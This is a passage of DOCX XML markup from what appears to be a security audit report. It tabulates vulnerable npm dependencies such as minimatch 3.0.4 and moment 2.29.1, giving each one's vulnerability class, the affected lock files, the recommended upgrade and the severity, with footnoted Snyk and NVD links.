              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>trim-newlines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.0.2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2719" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="101"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId125">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>minimatch@3.0.4</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="101"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ReDoS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
              <w:ind w:right="3405"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json app-backend/package-lock.json </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="210" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"minimatch"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="32"/>
              <w:ind w:left="693"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>3.0.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="33"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>minimatch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6.1.6</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1360" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="108"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId126">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>moment@2.29.1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="108"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ReDoS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Directory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Traversal</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Issues</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
              <w:ind w:right="3405"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json app-backend/package-lock.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487606272">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>110807</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="56" name="Graphic 56"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="56" name="Graphic 56"/>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8.724998pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15710208;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape43" coordorigin="1440,174" coordsize="2880,0" path="m1440,174l4320,174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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>71</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId127">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://security.snyk.io/package/npm/qs/6.5.2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>72</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId128">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://security.snyk.io/package/npm/trim-newlines/3.0.0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>73</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId129">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>3517</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>74</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId130">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://security.snyk.io/package/npm/moment/2.29.1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="7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020"/>
        <w:gridCol w:w="6620"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1559" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="100"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="37"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"node_modules/moment"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="31"/>
              <w:ind w:left="693"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>2.29.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="33"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>moment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2.29.4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2999" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="102"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>moment-timezone @0.5.33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="102"/>
              <w:ind w:right="546"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cleartext</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
